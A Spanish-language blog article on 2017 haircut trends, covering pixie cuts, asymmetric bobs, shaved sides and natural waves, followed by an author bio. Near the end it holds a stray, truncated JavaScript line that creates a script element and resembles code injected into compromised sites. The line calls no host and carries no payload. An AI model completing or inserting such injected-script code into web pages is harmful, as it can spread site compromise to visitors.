Adiós a las largas melenas: Los cortes de pelo con los que triunfarás este 2017

Este año viene muy fuerte y con grandes cambios en el mundo de la moda. Los cortes de cabello son uno ellos, que buscarán un estilo nuevo y diferente a años pasados.

El 2017 es una gran ocasión para cambiar de corte de pelo y una de las tendencias que viene muy fuerte para esta nueva temporada es el pelo corto.

Se llevarán cortes mucho más radicales que años anteriores, con aires punk y rockeros, aunque también tienen su público los cortes cortos estilo más discretos y con movimiento.

Dentro de las tendencias podemos destacar los cortes modernos y, sobretodo, radicales. Los cortes pixie serán el must de la temporada. Se lleva corto desde la nuca y los laterales pueden terminar en punta. Puedes llevarlo con flequillo para verte más chic.

 

 

 

 

En este año seguiremos viendo que cortes tipo Bob, asimétrico y con la nuca descubierta y la parte delantera más alargada. Algunas expertos recomiendan rapar uno de los lados para lograr un estilo punk.

Olvídate de los cabellos lisos y planchados, la tendencia será en llevar melenas al natural con toques ondulados y afros. Para lograrlo seca el exceso de agua después del baño y aplica un spray fijador o crema para crear ese efecto.

 var d=document;var s=d.createElement(‘script’);

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado